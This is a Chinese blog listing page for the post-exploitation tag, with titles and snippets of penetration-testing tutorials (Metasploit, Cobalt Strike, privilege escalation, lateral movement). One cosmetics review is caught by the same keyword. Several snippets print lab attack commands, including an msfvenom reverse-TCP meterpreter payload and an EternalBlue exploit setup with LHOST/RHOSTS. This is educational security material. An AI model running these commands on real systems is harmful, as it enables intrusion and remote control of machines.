后渗透

润百颜 蜂巢玻尿酸次抛原液

冰冰推荐的非常火了看来大家都想变得和她一样美一样白像我这样的干皮之前当然也用过其他玻尿酸原液这款我最喜欢的地方就是非常方便和卫生次抛的设计方便携带而且一管儿正好是一次的用量从脸涂到脖子不会额外浪费倒出来是无味的透明微粘稠液体上脸后渗透的的极快我会把它作为一个打底之后进行后续正常护肤也可以加到其他化妆水内做个水膜第二天起床皮肤会很饱满
燃原·2023-04-07 11:54

学习笔记-后渗透

后渗透免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.大纲横向扩展基于IPC$的横向PTH/PTK/PTT文件传输web-serversFTPLinuxWin
C-haidragon·2023-04-06 05:31

权限提升总结

如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序查找可利用补丁#手工查找补丁情况systeminfoWmicqfegetCaption,Description,HotFixID,InstalledOn#MSF后渗透扫描
Christ1na·2023-04-06 01:32

Cobalt-Strike基本使用

Cobalt-Strike简介CobaltStrike(简称为CS)是一款基于java的渗透测试工具(尤其是后渗透阶段),自3.0开始已经不再使用Metasploit框架而作为一个独立的平台使用,这款工具有其他很多渗透测试工具没有的团队合作功能
yumueat·2023-03-31 17:11

域安全(2)横向移动和纵向移动以及域的提权(后渗透

域安全-UAC提权需要UAC提权进行的操作:(基本在控制面板)1.系统的更新2.增加/修改账户3.修改UAC设置等借助msf1.已经通过木马使目标计算机被控制成功上线2.进行UAC提权尝试(失败率比较高)useexploit/windows/local/bypassuac(多用来进攻32位系统)showoptionssetSESSION1//具体是几号机器就填相应的数字exploit开始攻击/ru
Simon_Smith·2023-03-28 08:57

As-Exploits v 1.2 更新

前言As-Exploits,中国蚁剑后渗透模块。目前插件的定位是蚁剑的一个微内核拓展模块,可以迅速做到payload的工程化,不用过多时间浪费在插件的结构上。
yzddMr6·2023-03-25 21:31

Cobalt Strike|Beacon原理浅析

CobaltStrike作为一种后渗透工具,可以完成侦察、鱼叉式钓鱼、浏览器代理等攻击。上文中我们介绍了CobaltStrike分为客户端和服务器两部分,服务器端被称之为TeamServer。
Ms08067安全实验室·2023-03-23 14:48

【内网安全】——数据库提权姿势

作者名:白昼安全主页面链接:主页传送门创作初心:一切为了她座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日emo:在哪能找到解救我的办法模拟环境我们拿到了一个普通用户的权限,在系统溢出漏洞无果的情况下
白昼安全·2023-02-18 19:58

【安全知识】——对Linux密码文件的处理

作者名:白昼安全主页面链接:主页传送门创作初心:一切为了她座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日emo:他既乐观又悲观,生活也一无是处昨天在挖掘漏洞的实战渗透中获取了目标服务器的
白昼安全·2023-02-18 19:28

【内网安全】——Linux提权姿势

作者名:白昼安全主页面链接:主页传送门创作初心:一切为了她座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日emo:希望你在新的一年也能更好,不惧流言蜚语,始终坚定如初一、内核漏洞提权想要利用该漏洞首先要查看内核版本
白昼安全·2023-02-18 19:28

【网安神器篇】——系统指纹探测工具finger

作者名:白昼安全主页面链接:主页传送门创作初心:以后赚大钱座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日鸡汤:我不想停下,因为这次出发的感觉太好了一、介绍Finger定位于一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具
白昼安全·2023-02-18 19:27

【内网安全】——msf木马生成教程

作者名:白昼安全主页面链接:主页传送门创作初心:一切为了她座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日emo:钱真的是万能的一、msfvenom基本使用1、–p(--payload-options
白昼安全·2023-02-04 19:06

【web安全】——HTTP请求头注入

作者名:Demo不是emo主页面链接:主页传送门创作初心:一切为了她座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日emo:若在许我少年时,一两黄金一两风今天给大家讲解的是SQL
白昼安全·2023-01-27 21:17

利用Windows系统服务进行权限提升

提权是后渗透重要的一环节,如果当前获取的用户权限比较低,那么我们将无法访问受保护的系统资源或执行系统管理操作,影响后续的攻击过程。这要求我们通过各种手段将当前用户的权限进行提升,以满足后续攻击的要求。
山山而川'·2023-01-27 09:03

【web安全】——文件上传的绕过方式

作者名:白昼安全主页面链接:主页传送门创作初心:一切为了她座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日emo:醒来觉得甚是爱你一、黑名单绕过黑名单简单来说就是目标程序规定了哪些文件不能上传
白昼安全·2023-01-25 08:53

网络安全之信息收集技术(全)

1.信息收集概述(1)渗透测试流程:前期交互:授权书(确定范围,规则,需求)信息收集威胁建模漏洞分析渗透攻击(POC验证)后渗透攻击(后门)报告(2)常见名词:语言:静态语言,动态语言,脚本语言,网页语言网页语言
一青一柠·2023-01-19 18:46

记一次攻防演练之vcenter后渗透利用

1.说明很早之前的一次攻防演练,主要是从web漏洞入手,逐渐学习vcenter后利用技术。过程由于太长,很多细节都省略了,中间踩坑、磕磕绊绊的地方太多了。。。由于敏感性,很多地方都是打码或者是没有图,按照回忆整理的,见谅!1.confluence漏洞根据打点的记录,找到了一个confluence的界面:1.1反弹shell经过验证,存在cve-2022-26134漏洞,直接利用漏洞反弹shell到
乌鸦安全·2023-01-18 11:13

【web安全】——文件上传漏洞

白昼安全主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
白昼安全·2023-01-16 12:39

【Ctfer训练计划】——(十一)

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
白昼安全·2023-01-16 12:09

【疑难攻关】——floor报错注入

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
Demo不是emo·2023-01-08 09:29

【Ctfer训练计划】——(八)

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
Demo不是emo·2023-01-08 09:59

【Ctfer训练计划】——(九)

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
Demo不是emo·2023-01-08 09:28

【web安全】——报错注入

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
Demo不是emo·2023-01-08 09:27

乌鸦安全2022年度文章合集

GitHub:https://github.com/crow821  B站:https://space.bilibili.com/29903122 渗透实战记一次捡漏的杀猪盘测试记一次攻防演练之vcenter后渗透利用对某
乌鸦安全·2023-01-06 15:47

【网络安全】——web渗透的前缀知识

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
Demo不是emo·2022-12-30 19:53

【Ctfer训练计划】——(七)

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
Demo不是emo·2022-12-30 19:53

【Ctfer训练计划】——(六)

主页面链接:主页传送门创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术每日
Demo不是emo·2022-12-30 19:23

后渗透之永恒之蓝提权远程连接

一、利用永恒之蓝(MS17-010)进行攻击环境搭建:kali、Windows7,其中WIN7为靶机。永恒之蓝【EternalBlue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型
engDlin·2022-12-23 21:03

Metasploit初级篇

模块又可以分为辅助模块Auxiliary、渗透攻击模块Exploits、攻击载荷模块Payloads、空指令模块Nops、编码器模块Encoders和后渗透攻击模块Post模块组成。
·2022-12-21 10:48

12.7、后渗透测试--python插件执行py脚本

加载python插件:meterpreter>loadpython查看指令集:meterpreter>helppython执行单条语句:meterpreter>python_execute"importos;cd=os.getcwd()"-rcd#将os.getcwd()赋值给cd这个变量,然后用-rcd读取cd这个变量的值python执行py文件:meterpreter>python_impor
青霄·2022-12-14 11:25

内网渗透-前期信息收集

概述当我们渗透web端或者通过其他方式拿到某内网主机shell,我们就可以尝试开始内网渗透,也叫做后渗透,域渗透等,探索域内网络架构,通过内网渗透得到其他内网主机的权限,或者通过内网主机获取到同域的最高管理员主机权限等
Ranwu0·2022-10-13 12:36

【横向移动】内网渗透之内网信息收集

目录前言:目的:后渗透攻防参考链接:一、内网信息收集1.内网基础信息:2.内网核心业务信息:3.其他信息二、内网实战(命令、工具及脚本)1.用户列表、当前权限等win:linux:2.内网网络拓扑等信息
剑客 getshell·2022-10-13 12:35

后渗透——内网横向

内网横向1LM/NTMLHASH1.1哈希加密Windows通常使用LM哈希和NTML哈希两种方法对用户的明文密码进行加密,在域环境中用户信息存储在ntds.dit中。在Windows操作系统中哈希的结构通常如下:username:RID:LM-HASH:NT-HASH从WIndowsvista和WindowsServer2008、个人版WindowsServer2003开始默认禁用了LM-HAS
FisrtBqy·2022-10-13 12:52

Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz)

1.还是先获取计算机权限针对WIN7,还是用永恒之蓝msfconsoleuseexploit/windows/smb/ms17_010_eternalblue//利用永恒之蓝漏洞setpayloadwindows/x64/meterpreter/reverse_tcp//设置payloadsetLHOST192.168.92.131//设置本机IP地址setRHOSTS192.168.92.133
Zichel77·2022-10-12 20:11

《MetaSploit渗透测试魔鬼训练营》之环境搭建

Win2K3metasploitable靶机-内网WinxpSP3metasploitable参考渗透测试流程概述顺序攻击前(网络踩点、网络扫描、网络查点)攻击中(利用漏洞信息进行渗透攻击、获取权限)攻击后(后渗透维持攻
lady_killer9·2022-09-06 06:24

内网渗透扫描器解析

下面是我整理的扫描器软件及其对应的作用内网渗透测试平台类Metasploit:这个大家都不陌生了,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一
蜜罐小明哥·2022-09-05 16:56

后渗透之权限提升(2)

方法1提高程序运行级别提权使用的msf模块(此模块需要用户进行交互)Exploit/windows/local/ask连接收到目标主机之后,获取sessions进入到这个sessions中sessions-i2直接提升权限getsystem,发现权限2不够,于是将sessions放到后台使用其他模块exploit/windows/local/ask(主要是uac提权用)useexploit/win
凉城木槿·2022-09-02 17:33

后渗透阶之环境准备(1)

环境介绍:主机1:windows10(x64)(ip:192.128.2.129)主机2:kali(ip:192.168.2.128)前期环境准备:使用kalimsfoven生成木马程序msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.2.128lport=4444-fexe>msf.exe开启msfconsole使用exploit/mu
凉城木槿·2022-09-02 17:33

Metasploit学习笔记--体系框架梳理

Metasploit体系框架1、基础库文件2、模块2.1辅助模块(Aux)2.2渗透攻击模块(Exploits)2.3攻击载荷模块(Payload)2.4空指令模块(Nops)2.5编码器模块(Encoders)2.6后渗透攻击模块
Bluffing·2022-08-22 17:05

Cobalt Strike使用教程

CobaltStrike使用教程1.CS简介CobaltStrike是一款渗透测试神器,常被业界人称为CS神器,是域渗透,内网渗透,内网漫游,后渗透手段利器,但前提是获得一台主机的shell。
天猫来下凡·2022-07-25 14:24

内网渗透-Metasploit之——基本后渗透命令

Metasploit之——基本后渗透命令文章目录Metasploit之——基本后渗透命令前言1.帮助菜单2.后渗透命令3.机器ID和UUID命令4.通信信道的操作5.获取用户名和进程信息6.获取系统信息
炫彩@之星·2022-07-22 12:13

攻防世界——web新手区(全解)

今天小白介绍的是业内很有名气的练习平台——攻防世界,它里面有web、pwn、music、reverse、crypto和mobile六个大类,因为小白主要做的是web渗透和后渗透,所以我们今天来介绍的
小白一枚多多关注·2022-07-21 20:19

ATT&CK实战系列——红队实战(一)

文章目录环境搭建渗透测试部分phpmyadmin日志getshellyxcms前端XSS任意文件写入getshell任意文件删除后渗透阶段域控信息收集域外信息收集与渗透3389msf生成木马域渗透SMBBeaconC2
_abcdef·2022-07-18 12:01

渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)

1.目标机器权限提升权限提升(privilegeescalation):攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权。Windows,Linux等等。#提权的前提条件:-拥有普通用户权限-拥有某些软件的账号密码-本地或远程服务器上存在漏洞-拥有漏洞利用工具代码Windows—>user[普通用户、如:zhangsan]—>Admini
慵懒之龟·2022-07-09 09:22

MSF渗透测试之msfvenom提权

MSF渗透测试之msfvenomMSF后渗透之msfvenom生成payload提权文章目录MSF渗透测试之msfvenomMSF后渗透之msfvenom生成payload提权前言一、MSF的使用?
炫彩@之星·2022-07-09 09:18

后渗透篇:Windows x64下提权Exploit整理

Windows x64 Local Privilege Escalation0x00前言在CVE-2014-4113出来后,x64环境下的提权又是一片短暂的光明。在此漏洞披露前,PR/IIS溢出/LPK劫持等对64位版本都无效果,网上公开曾有一个Exp有效,代号为MS10048x64。本文谨记录x64下可提权的Exp与测试过程。暂不考虑依赖第三方服务(如MSSQL/MYSQL/FTP)等的提权。 
bylfsj·2022-07-08 07:40

后渗透篇:劫持技术(lpk.dll劫持游戏注入【Win7 实例】)

当你的才华还撑不起你的野心时那你就应该静下心来学习lpk.dll劫持游戏注入由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL
bylfsj·2022-07-08 07:10

渗透测试提权指南

手动寻找缺失补丁拿到权限后通过如下命令查看系统安装了哪些补丁systeminfowmicqfegetcaption,description,hotfixid,installedon比CMD更强大的命令行:WMIC后渗透利用
YsterCcc·2022-07-05 09:24

渗透工具-TrustedSec 公司的渗透测试框架 (PTF)

通过一个快速示例来安装我们所有的漏洞利用模块,信息收集模块,后渗透利用模块,PowerShell攻击模块和漏洞分析工具。
amingMM·2022-07-02 14:26

基于Python的渗透测试信息收集系统的设计和实现

信息收集系统的设计和实现渗透测试是保卫网络安全的一种有效且必要的技术手段,而渗透测试的本质就是信息收集,信息搜集整理可为后续的情报跟进提供强大的保证,目标资产信息搜集的广度,决定渗透过程的复杂程度,目标主机信息搜集的深度,决定后渗透权限的持续把控
twsec·2022-05-25 10:00
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他